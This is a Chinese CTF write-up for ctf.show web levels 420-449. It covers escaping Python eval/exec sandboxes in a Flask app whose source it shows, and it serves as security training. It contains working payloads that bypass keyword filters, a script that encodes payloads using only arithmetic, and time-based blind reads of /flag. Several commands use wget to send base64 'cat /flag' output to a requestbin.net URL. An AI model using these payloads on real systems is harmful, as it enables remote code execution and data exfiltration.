【WEB入门】420-449

admin 2022年1月5日22:48:37CTF专场评论15 views3069字阅读10分13秒阅读模式

>

>

【WEB入门】420-449

hdxw

web420

ls ..
nl ../*

web421

ls
nl f*

web422

ls
nl *

web423-web433

?code=__imp%EF%BD%8Frt__(%27o%27%27s%27).p%EF%BD%8Fpen(%27cat /flag%27).re%EF%BD%81d()
from flask import Flask
from flask import request
import re


app = Flask(__name__)
@app.route('/')
def app_index():
    code = request.args.get('code')
    if code:
    	reg = re.compile(r'os|open|system|read|eval|builtins')
    	if reg.search(code)==None:
    		return eval(code)
    return 'where is flag?<!-- /?code -->'

if __name__=="__main__":
    app.run(host='0.0.0.0',port=80)

web434-web439

没有curl

?code=exec(request.args[%27c%27])&c=print(__import__(%27os%27).popen(%27wget+http%3a%2f%2frequestbin.net%2fr%2f4f26lr0j?a=`ls%20/|base64`%27).read())

?code=exec(request.args[%27c%27])&c=print(__import__(%27os%27).popen(%27wget+http%3a%2f%2frequestbin.net%2fr%2f4f26lr0j?a=`cat%20/flag|base64`%27).read())

web440-web441

过滤了引号

?code=exec(request.args[chr(99)])&c=print(__import__(%27os%27).popen(%27wget+http%3a%2f%2frequestbin.net%2fr%2f4f26lr0j?a=`cat%20/flag|base64`%27).read())

web442

过滤了数字

?code=exec(request.args[str(None)])&None=print(__import__(%27os%27).popen(%27wget+http%3a%2f%2frequestbin.net%2fr%2f4f26lr0j?a=`cat%20/flag|base64`%27).read())

web443

开始上脚本

import base64,requests

value_table = [
"len(str(None))","(4//4)","(4-4//4-4//4)","(4-4//4)","4","(4*4//(4-4//4))",
"((4-4//4-4//4)*(4-4//4))","(4*4-4-4-4//4)","(4*4-4-4)","((4-4//4)*(4-4//4))","((4-4//4-4//4)*(4*4//(4-4//4)))"
][::-1]

playload="""eval(request.args['a'])"""
hexvalue = base64.b16encode(playload.encode()).decode().lower()
print(hexvalue)
tovalue = str(int(hexvalue,16))
print(tovalue)

if (len(tovalue)+9)%10 == 0:
    value_str = "pow(s10,s%s*s10)"%(len(tovalue)//10)
else:
    value_str = "pow(s10,s%s*s10-s%s)" % ((len(tovalue) // 10)+1,10 - ((len(tovalue) + 9) % 10)-1)
# print(value_str)
tovalue = tovalue[::-1]
i=0
while len(tovalue) > 0:
    c = tovalue[0]
    if c!="9":
        if i==0:
            cstr = "-s%s"%(9-int(c))
        elif i <= 10:
            cstr = "-s%s*pow(s10,s%s)" % (9 - int(c), i)
        elif i%10 == 0:
            cstr = "-s%s*pow(s10,s%s*s10)" % (9-int(c), i // 10)
        else:
            cstr = "-s%s*pow(s10,s%s*s10-s%s)" % (9-int(c), (i // 10) + 1, 10 - (i % 10))
        value_str += cstr
    i += 1
    tovalue = tovalue[1:]

value_str += "-s1"


for i in range(len(value_table)):
    value_str = value_str.replace("s"+str(len(value_table)-i-1), value_table[i])

print(eval(value_str))
value_str = ("exec(bytes.fromhex(hex("+value_str+")[4-4//4-4//4:]).decode())").replace("4","len(str(None))")
# print(eval(value_str))
# print(value_str)

c="print(__import__('os').popen('wget http://requestbin.net/r/4f26lr0j?a=`cat /flag|base64`').read())"
print(requests.post("http://368118f3-e935-42ad-b151-46e5b7000f89.chall.ctf.show/?a="+c,data={
    "code": value_str
}).text)

web444

过滤了len,改用-~sum([])

web445

del os.system
del os.popen

c="print(__import__('subprocess').call(['wget http://requestbin.net/r/4f26lr0j?a=`cat /flag|base64`'],shell=True))"

参考:https://www.cnblogs.com/rangger/p/9801588.html

web446

del imp.reload

不印象,web445脚本继续杀

web447-web449

import subprocess
del subprocess.Popen
del subprocess.call
del subprocess.run
del subprocess.getstatusoutput
del subprocess.getoutput
del subprocess.check_call
del subprocess.check_output
import timeit
del timeit.timeit

好家伙

代码同上446,命令执行改为时间盲注

print(__import__('time').sleep(2) if open('/flag').read()[%s]=='%s' else 1)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月5日22:48:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【WEB入门】420-449 http://cn-sec.com/archives/719353.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: